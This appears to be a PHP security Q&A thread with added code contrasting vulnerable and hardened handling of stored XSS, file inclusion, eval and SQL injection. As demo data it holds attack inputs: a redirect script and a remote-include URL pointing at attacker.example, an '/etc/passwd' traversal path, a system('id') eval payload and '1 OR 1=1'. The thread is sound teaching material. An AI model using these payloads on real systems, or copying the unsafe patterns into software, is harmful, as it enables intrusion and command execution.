How to secure PHP from piggy backing?


I just read this article about piggy backing in PHP.

I googled it but not so much information there.

Can anyone tell me more details on how to prevent this kind of attack, what kind of code practices are vulnerable, and what we should do?

Thanks in advance.



The BBC news article is talking about "persistent XSS". Leave it to the news to talk about hacking without mentioning anything about vulnerabilities. But that could be that bbc.co.uk doesn't know what an XSS vulnerability is, because if they did they would patch their own damn site!

There are many ways to achieve remote code execution against a PHP web application. No one should ever call this "PHP Injection", if they call it this then they don't know what they are talking about. A Study In Scarlet is an excellent paper that details many different methods that an attacker can use to obtain remote code execution against a PHP application. This paper is intended for malicious hackers, not developers.

XSS is by far the easiest and most common method to nefariously place advertisements on somebody's site.
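To make the "persistent XSS" point concrete, here is an added example that is not part of the original thread. It assumes a comment feature that stores visitor-submitted text and later renders it into an HTML page; the stored comments are constructed for the demo. The injected script only fires for visitors arriving from a search engine, which is the cloaking behaviour the article's "piggybacking" label seems to describe.

```php
<?php
// Added example: stored (persistent) XSS and the output-encoding fix.
// Assumption: comments are saved server-side and echoed back into HTML.
declare(strict_types=1);

// Constructed sample data: one normal comment and one an attacker submitted.
// The payload only redirects visitors whose referrer is a search engine, so
// the site owner browsing directly never sees anything change.
$storedComments = [
    'Nice post!',
    '<script>if(document.referrer.indexOf("google")!==-1){location="https://attacker.example/"}</script>',
];

// Vulnerable: stored text is interpolated straight into the page.
function renderUnsafe(array $comments): string
{
    $html = '';
    foreach ($comments as $c) {
        $html .= "<li>$c</li>\n";
    }
    return $html;
}

// Hardened: every untrusted string is HTML-encoded at the point of output.
// ENT_QUOTES also encodes ' and ", so the value is safe inside attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of silently dropping output.
function renderEscaped(array $comments): string
{
    $html = '';
    foreach ($comments as $c) {
        $html .= '<li>'
            . htmlspecialchars($c, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8')
            . "</li>\n";
    }
    return $html;
}

echo "--- unsafe (browser would execute the script) ---\n";
echo renderUnsafe($storedComments);
echo "--- escaped (script arrives as inert text: &lt;script&gt;...) ---\n";
echo renderEscaped($storedComments);
```

Encoding must match the context the value lands in: `htmlspecialchars` is correct for HTML text and attributes, but a value placed inside a `<script>` block or a URL needs JSON or URL encoding instead, and no single function covers all three.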


That article seems to refer to a vulnerable web application, not anything specific to PHP.

This previous thread provides some useful information regarding writing secure PHP code:

What security issues should I look out for in PHP

If we take the "They used these vulnerabilities to inject PHP code into the site" part of the article literally, then the developers likely used user input with include/require statements or eval.
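The include/require and eval cases this answer describes, as an added example that is not from the original thread. The `pages/` directory, the `page` parameter and the `calc` helper are assumptions for the demo; the point is that a request parameter must never become a file path or a code string, and that an allowlist (not escaping) is the fix.

```php
<?php
// Added example: user input reaching include() and eval(), and the allowlist fix.
// Assumptions: pages live under ./pages/, selected by a ?page= parameter.
declare(strict_types=1);

// Vulnerable: the request parameter becomes part of a file path.
//   ?page=../../../../etc/passwd      -> local file inclusion (path traversal)
//   ?page=http://attacker.example/x   -> remote file inclusion if allow_url_include is on
// Appending '.php' is not a defence: on PHP < 5.3.4 a %00 byte truncated the path.
function pagePathUnsafe(string $page): string
{
    return __DIR__ . '/pages/' . $page . '.php';
}

// Hardened: the parameter is only a key into a fixed map; anything else is a 404.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function pagePathSafe(string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$page];
}

// Vulnerable: eval() turns a request parameter into executable PHP.
//   ?expr=1);system('id');//   -> arbitrary command execution
function calcUnsafe(string $expr): mixed
{
    return eval('return (' . $expr . ');');
}

// Hardened: parse the tiny grammar you actually need instead of calling eval().
function calcSafe(string $expr): ?int
{
    if (preg_match('/^\s*(\d+)\s*([+\-*])\s*(\d+)\s*$/', $expr, $m) !== 1) {
        return null; // not in the allowed form: reject
    }
    [$a, $op, $b] = [(int) $m[1], $m[2], (int) $m[3]];
    return match ($op) {
        '+' => $a + $b,
        '-' => $a - $b,
        '*' => $a * $b,
    };
}

// Demo on constructed inputs (no files are actually included here).
$page = '../../etc/passwd';
echo "unsafe path: ", pagePathUnsafe($page), "\n";
echo "safe path:   ", var_export(pagePathSafe($page), true), "\n";
echo "safe path:   ", pagePathSafe('about'), "\n";

$expr = "1);system('id');//";
echo "calcSafe(attack): ", var_export(calcSafe($expr), true), "\n";
echo "calcSafe('6*7'):  ", calcSafe('6*7'), "\n";
```

A realpath()/prefix check is a weaker alternative to the allowlist (it still lets the attacker choose among every file under the directory), and `allow_url_include` should stay off in php.ini regardless.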


The article isn't particularly clear, but my guess is that they just used SQL injection and, to try to avoid detection, they inserted a script that didn't actually change the behavior of the site normally unless the visitor came from Google using a relevant search term, and the author is calling the redirection in that situation "piggybacking".

So: escape and validate all user input.
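The SQL injection scenario this answer guesses at, as an added example that is not part of the original thread. It uses an in-memory SQLite database through PDO so it runs from the CLI without a server; the `posts` table and the `1 OR 1=1` payload are constructed for the demo. It also shows why "validate" belongs beside "escape": a parameterised query stops the injection, and a type check rejects the bad value before the database ever sees it.

```php
<?php
// Added example: SQL injection via string concatenation vs. a prepared statement.
// Assumptions: a posts table looked up by a numeric ?id= parameter.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO posts (title, body) VALUES ('Hello', 'first post'), ('Second', 'another post')");

// Vulnerable: the request parameter is concatenated into the query text.
// With a MySQL driver that allows stacked queries, the same hole also lets an
// attacker run an UPDATE that appends a script to every post body.
function findPostUnsafe(PDO $db, string $id): array
{
    $sql = "SELECT id, title, body FROM posts WHERE id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate the shape of the input, then bind it as a parameter so
// the database receives query structure and data separately.
function findPostSafe(PDO $db, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null; // not a non-negative integer: reject before querying
    }
    $stmt = $db->prepare('SELECT id, title, body FROM posts WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$payload = '1 OR 1=1';

echo "unsafe rows returned: ", count(findPostUnsafe($db, $payload)), "\n"; // 2: WHERE bypassed
echo "safe result:          ", var_export(findPostSafe($db, $payload), true), "\n"; // NULL
echo "safe lookup of '2':   ", findPostSafe($db, '2')['title'], "\n"; // Second
```

Set `PDO::ATTR_EMULATE_PREPARES` to `false` on MySQL so the driver uses real server-side prepared statements rather than client-side escaping, and keep the validation step even with binding: it is what turns a garbage value into a clean 400 instead of an empty result.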


The first link, on the general subject, should give you some overview.

The second link is PHP/SQL-specific and should lead you to enlightenment.